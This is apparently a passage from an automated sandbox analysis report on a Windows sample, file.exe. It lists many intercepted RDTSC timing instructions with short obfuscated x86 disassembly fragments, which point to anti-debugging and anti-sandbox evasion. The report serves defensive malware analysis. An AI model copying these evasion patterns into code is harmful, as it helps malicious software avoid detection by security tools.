                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135613 second address: 1135617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11369CC second address: 11369E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D106F765Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11369E0 second address: 11369E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DA83 second address: 113DA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114024E second address: 114026F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F9D1073AE66h 0x00000009 jmp 00007F9D1073AE76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11508A1 second address: 11508B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F765Bh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150200 second address: 1150223 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F9D1073AE66h 0x00000009 jmp 00007F9D1073AE76h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150223 second address: 1150254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jno 00007F9D106F7656h 0x00000014 jmp 00007F9D106F7669h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150254 second address: 115025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115025C second address: 1150261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150261 second address: 115026D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F9D1073AE66h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11503D8 second address: 11503DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11503DC second address: 11503F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F9D1073AE72h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11503F4 second address: 11503F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11503F9 second address: 1150448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007F9D1073AE70h 0x0000000d je 00007F9D1073AE66h 0x00000013 jmp 00007F9D1073AE72h 0x00000018 jmp 00007F9D1073AE73h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jc 00007F9D1073AE66h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150448 second address: 115044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115044C second address: 1150452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11527EC second address: 115280E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9D106F7669h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115280E second address: 1152831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F9D1073AE6Eh 0x0000000c jmp 00007F9D1073AE6Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152831 second address: 1152837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156E7F second address: 1156E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE73h 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162576 second address: 116257D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10815B4 second address: 1081603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE6Dh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F9D1073AE6Eh 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F9D1073AE66h 0x00000019 jmp 00007F9D1073AE72h 0x0000001e pushad 0x0000001f jmp 00007F9D1073AE79h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081603 second address: 1081609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081609 second address: 108160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116696D second address: 1166987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F7666h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166C84 second address: 1166C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166C88 second address: 1166C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166C94 second address: 1166CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D1073AE6Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166CA2 second address: 1166CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166CA6 second address: 1166CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F9D1073AE66h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166CB6 second address: 1166CCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jne 00007F9D106F7662h 0x0000000f jnp 00007F9D106F7656h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166CCD second address: 1166CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166CD5 second address: 1166CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166E25 second address: 1166E36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166E36 second address: 1166E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166E3C second address: 1166E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166E40 second address: 1166E63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9D106F7667h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116727E second address: 1167291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C68E second address: 116C6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F9D106F7665h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F9D106F7662h 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 jmp 00007F9D106F7664h 0x0000001c push edx 0x0000001d jmp 00007F9D106F7668h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C20E second address: 116C21A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9D1073AE66h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A552 second address: 118A556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D4AE second address: 118D4B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D4B2 second address: 118D4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F7664h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D4CC second address: 118D4DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F9D1073AE6Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D4DF second address: 118D4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D164 second address: 118D16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D16A second address: 118D177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F9D106F7656h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D177 second address: 118D193 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D1073AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F9D1073AE6Bh 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F783 second address: 118F78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F78A second address: 118F7C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 jmp 00007F9D1073AE77h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jmp 00007F9D1073AE6Fh 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8089 second address: 11A808D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A808D second address: 11A8095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A837A second address: 11A837E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A837E second address: 11A83A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F9D1073AE79h 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8948 second address: 11A894C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A894C second address: 11A897B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F9D1073AE6Ch 0x00000012 popad 0x00000013 push ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9D1073AE6Bh 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A897B second address: 11A8981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8981 second address: 11A8986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8986 second address: 11A898B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A898B second address: 11A899F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9D1073AE6Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ACE0F second address: 11ACE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9D106F765Eh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD16A second address: 11AD174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F9D1073AE66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD174 second address: 11AD1A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F9D106F765Eh 0x00000011 jmp 00007F9D106F7665h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD1A4 second address: 11AD1F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D279Eh], edx 0x0000000f sub edx, dword ptr [ebp+124954ECh] 0x00000015 push 00000004h 0x00000017 je 00007F9D1073AE69h 0x0000001d movsx edx, ax 0x00000020 jnp 00007F9D1073AE7Fh 0x00000026 push 8686235Dh 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9D1073AE6Dh 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD3EB second address: 11AD422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9D106F7663h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD422 second address: 11AD440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD440 second address: 11AD45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F9D106F765Dh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE5A0 second address: 11AE5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE6Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE5AE second address: 11AE5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE5B4 second address: 11AE5C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE5C1 second address: 11AE5DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AFE03 second address: 11AFE0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AFE0D second address: 11AFE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1CFB second address: 11B1D08 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9D1073AE68h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B002FB second address: 4B0036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D106F7667h 0x00000009 adc cx, 171Eh 0x0000000e jmp 00007F9D106F7669h 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F9D106F7665h 0x00000024 and cx, 0806h 0x00000029 jmp 00007F9D106F7661h 0x0000002e popfd 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF0188 second address: 4AF019D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF019D second address: 4AF01A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF01A3 second address: 4AF01A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF01A7 second address: 4AF021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushfd 0x0000000c jmp 00007F9D106F7661h 0x00000011 add cx, 0B46h 0x00000016 jmp 00007F9D106F7661h 0x0000001b popfd 0x0000001c pop esi 0x0000001d call 00007F9D106F7661h 0x00000022 pushfd 0x00000023 jmp 00007F9D106F7660h 0x00000028 sbb esi, 1673FB18h 0x0000002e jmp 00007F9D106F765Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 mov dword ptr [esp], ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF021B second address: 4AF021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF021F second address: 4AF022F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF022F second address: 4AF0235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF0235 second address: 4AF0239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30102 second address: 4B30106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30106 second address: 4B3010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC00F2 second address: 4AC00F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC00F6 second address: 4AC010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9D106F765Bh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC010B second address: 4AC0171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, CC6Fh 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007F9D1073AE72h 0x00000017 push dword ptr [ebp+04h] 0x0000001a pushad 0x0000001b push esi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f pushad 0x00000020 movzx eax, dx 0x00000023 mov bh, E7h 0x00000025 popad 0x00000026 popad 0x00000027 push dword ptr [ebp+0Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F9D1073AE79h 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0E50 second address: 4AE0E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0936 second address: 4AE093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
